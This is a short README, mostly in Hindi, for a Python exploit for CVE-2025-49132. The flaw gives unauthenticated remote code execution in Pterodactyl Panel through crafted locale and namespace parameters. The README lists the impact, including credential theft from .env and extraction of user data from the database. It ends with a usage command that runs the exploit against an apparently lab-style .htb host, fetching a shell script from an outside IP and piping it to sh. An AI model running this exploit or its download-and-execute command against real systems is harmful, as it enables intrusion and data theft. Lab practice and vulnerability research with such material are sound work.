
CVE-2025-49132 के लिए Python एक्सप्लॉइट, जो गढ़े गए लोकेल और नाम स्थान पैरामीटरों के माध्यम से Pterodactyl Panel पर अप्रमाणित दूरस्थ कोड निष्पादन सक्षम करता है।
प्रभाव
/locales/locale.json में locale और namespace क्वेरी पैरामीटर्स का उपयोग करके, एक दुर्भावनापूर्ण अभिनेता बिना प्रमाणीकरण के मनमाना कोड निष्पादित करने में सक्षम होता है।
मनमाना कोड निष्पादित करने की क्षमता के साथ, इस कमजोरी का अनगिनत तरीकों से शोषण किया जा सकता है। इसका उपयोग पैनल के सर्वर तक पहुँच प्राप्त करने, पैनल के कॉन्फ़िग (.env या अन्य) से क्रेडेंशियल्स पढ़ने, डेटाबेस से संवेदनशील जानकारी (जैसे उपयोगकर्ता विवरण [उपयोगकर्ता नाम, ईमेल, प्रथम और अंतिम नाम, हैशेड पासवर्ड, आईपी पते, आदि]) निकालने, पैनल द्वारा प्रबंधित सर्वरों की फ़ाइलों तक पहुँचने आदि के लिए किया जा सकता है।
How to use
python exploit.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'